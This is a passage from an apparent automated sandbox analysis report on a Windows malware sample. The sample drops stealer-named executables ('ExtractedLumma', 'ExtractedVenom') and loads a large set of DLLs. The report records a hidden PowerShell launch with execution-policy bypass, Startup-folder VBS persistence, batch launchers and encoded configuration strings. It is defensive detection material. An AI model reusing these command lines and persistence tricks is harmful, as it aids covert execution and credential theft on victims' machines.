'l439UHfThXI7Tvv4tLPkRk4LgJxneAQ3SRt6rij4oIvNCNJh0dGkWYtmoBCaQASy+UxakX8pDIHBYYo6I0jgiA==', 'H36CdwWLE8twm6SaEVP4wCqEXttEdFNm1/TG0CIbxJ6QscVZsS9u+iDyyURaAEJfbnGnfKxPezH51YuRdKUEGw==', 'X+lWHHhlIbk/ipVH2n6hOx1tpa9s2D5Jo0CwgGIgu5WBtb6gmcLOKhvfywa/wW2BsaqNON/3eZUEUOX0Z6TMoQ=='
Source: 26.2.vm.exe.4e30000.1.raw.unpack, Settings.cs Base64 encoded string: 'uv876R64GyPQROS6Pcq+tT2rujm6QhOA2jKz3+72iK0vssZ7tRu9W1NfcaQ5yk3K4leNInPIlyvrm/sWNe6YUSzW9MnjujJ8wA3fVO6kqY4=', 'tBbcnyqIuxWvE/Aa008Phm66l0gx08l3V72N0uezc1BvWV+aVFh/K2LjDSmziiX4d1we58iQkTKHp5hlA6J3ArDNNUTcH31I6D+8IIWmVEXPfFcr7grctRvtFWbh8/WW', 'vlrU2ttL4QCN9XP+miA1iO2Zi1Qo5KKeTfPUgLmvXsgl1b/ZXBNeN/RykY5FXUbGAFb/hcKmdGI2lxq9dyDNOg==', 'jajjt4fLdfeySHLjOUN+WU7vKFN/tv6flHwdN63QqNLvwdiPerPjqi8pJYhlDxutlcONhE6KmVeSyHLXzp1X0ivMLOia3ounzEFu+OufC35pSXOr0AgnutA9Hm2WMXLR5SrKu9Ep2d9bPbB7jBc3VXBVjkPHm+BjMjy64M6HAubGgc8bZ4x9RmkpsgBYOzwKBmFDp7rKGTxhnrnem674/IV8HtJhbUivlbelAfQbN92NlB/IZHSII0WCgZyWHfjXPeAh7ScQvm1glooPfQyjEFujB5EgoLg8/Q+UZ9OyLZY=', '/3HMGRMO5mfkdekqR4Zafv717iumQMzpVLF6A9pHRaBxVKyvDxb55/QnfojY3GM4MZFgEKqs9lZExa/oUaQFQQ==', 'l439UHfThXI7Tvv4tLPkRk4LgJxneAQ3SRt6rij4oIvNCNJh0dGkWYtmoBCaQASy+UxakX8pDIHBYYo6I0jgiA==', 'H36CdwWLE8twm6SaEVP4wCqEXttEdFNm1/TG0CIbxJ6QscVZsS9u+iDyyURaAEJfbnGnfKxPezH51YuRdKUEGw==', 'X+lWHHhlIbk/ipVH2n6hOx1tpa9s2D5Jo0CwgGIgu5WBtb6gmcLOKhvfywa/wW2BsaqNON/3eZUEUOX0Z6TMoQ=='
Source: 2D42.exe.1.dr, PowerShellLoader.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 2D42.exe.1.dr, PowerShellLoader.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 26.2.vm.exe.4e30000.1.raw.unpack, Methods.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 26.2.vm.exe.4e30000.1.raw.unpack, Methods.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 19.2.vm.exe.4e40000.1.raw.unpack, Methods.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 19.2.vm.exe.4e40000.1.raw.unpack, Methods.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@40/44@12/16
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Code function: 7_2_00007FF64166F5B0 LookupPrivilegeValueA,AdjustTokenPrivileges,OpenProcessToken, 7_2_00007FF64166F5B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 16_2_03079C80 CoCreateInstance, 16_2_03079C80
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\adjijwj
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2736:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Mutant created: \Sessions\1\BaseNamedObjects\8yUscnjrUY
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5984:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3624:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:940:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2344:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Mutant created: \Sessions\1\BaseNamedObjects\aqswvfsywrpgi
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2004
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5724
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\8EC7.tmp
Source: C:\Users\user\AppData\Local\Temp\EF14.exe File opened: C:\Windows\system32\0dac501b8d19111c7bce9a7ce47575ef7a8b648351979b7f5b84fa7f76790c54AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_Processor
Source: C:\Windows\explorer.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: lm.exe, 00000014.00000003.2662227068.0000000003129000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2658565085.0000000003205000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Virustotal: Detection: 58%
Source: EF14.exe String found in binary or memory: .1h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c= depgithub.com/edsrzf/mmap-gov1.1.0h1:6EUwBLQ/Mcr1EYLE4Tn1VdW1A4ckqCQWZBw8Hr0kjpQ= depgithub.com/filecoin-project/go-addressv1.1.0h1:ofdtUtEsNxkIxkDw67ecSmvtzaVSdcea4boAmLbnHfE= depgithub.com/filecoin-pr
Source: EF14.exe String found in binary or memory: seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanL
Source: EF14.exe String found in binary or memory: eap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listrunti
Source: EF14.exe String found in binary or memory: 4z/Oni01D2Gm1Du/vo7/ADDErEP0DNhYaqvcF1p/cFSLGEgObC3rn8jqKTnzuNp4wHD4+XFMSIRNAIIzjOX/KZNc3PRk/O0O7ASRoZctsH2Bd1nJGgtmCymXVz7Rpdu4Nm50g77Trg6nTXIg1ur3ovBmkCw7pL+BrZx45wBgh/hLl9XRe424S9Lh2ZXPjbs4697O00XFV32GKA29/QTxEtCdWE4CQix59dE/Tc+MNcfWwyxJV1ePU1UKPn9EjTGGdTeh
Source: EF14.exe String found in binary or memory: &github.com/filecoin-project/go-address
Source: EF14.exe String found in binary or memory: net/addrselect.go
Source: EF14.exe String found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.encode
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.NewFromBytes
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.newAddress
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.Address.Payload
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.Address.Protocol
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.decode
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.Checksum
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.base32decode
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.hash
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.Address.MarshalBinary
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.ValidateChecksum
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.init.1
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.(*Address).UnmarshalBinary
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.(*Address).MarshalBinary
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.(*Address).Bytes
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.(*Address).String
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.(*Address).MarshalJSON
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.init
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.Address.Bytes
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.init.func1
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.init.0
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.Address.String
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.init.func2
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.Address.MarshalJSON
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.(*Address).UnmarshalJSON
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.NewSecp256k1Address
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.NewIDAddress
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.NewActorAddress
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.addressHash
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.NewDelegatedAddress
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address.NewBLSAddress
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address@v1.1.0/address.go
Source: EF14.exe String found in binary or memory: github.com/filecoin-project/go-address@v1.1.0/constants.go
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
Source: unknown Process created: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe "C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\adjijwj C:\Users\user\AppData\Roaming\adjijwj
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\8EC7.exe C:\Users\user\AppData\Local\Temp\8EC7.exe
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\EF14.exe C:\Users\user\AppData\Local\Temp\EF14.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\2D42.exe C:\Users\user\AppData\Local\Temp\2D42.exe
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process created: C:\Users\user\AppData\Local\Temp\2D42.exe "C:\Users\user\AppData\Local\Temp\2D42.exe" -HOSTRUNAS
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\EF14.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedLumma\run.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe "vm.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe "lm.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe "vm.exe"
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2004 -s 1092
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5724 -s 1680
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\8EC7.exe "C:\Users\user\AppData\Local\Temp\8EC7.exe"
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\8EC7.exe "C:\Users\user\AppData\Local\Temp\8EC7.exe"
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe Section loaded: apphelp.dll
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe Section loaded: webio.dll
Source: C:\Windows\explorer.exe Section loaded: cdprt.dll
Source: C:\Windows\explorer.exe Section loaded: netapi32.dll
Source: C:\Windows\explorer.exe Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe Section loaded: amsi.dll
Source: C:\Windows\explorer.exe Section loaded: wpnapps.dll
Source: C:\Windows\explorer.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\explorer.exe Section loaded: capabilityaccessmanagerclient.dll
Source: C:\Windows\explorer.exe Section loaded: smartscreenps.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Roaming\adjijwj Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\EF14.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\EF14.exe Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\EF14.exe Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: msisip.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: wshext.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: appxsip.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: mshtml.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: srpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: msiso.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: uiautomationcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
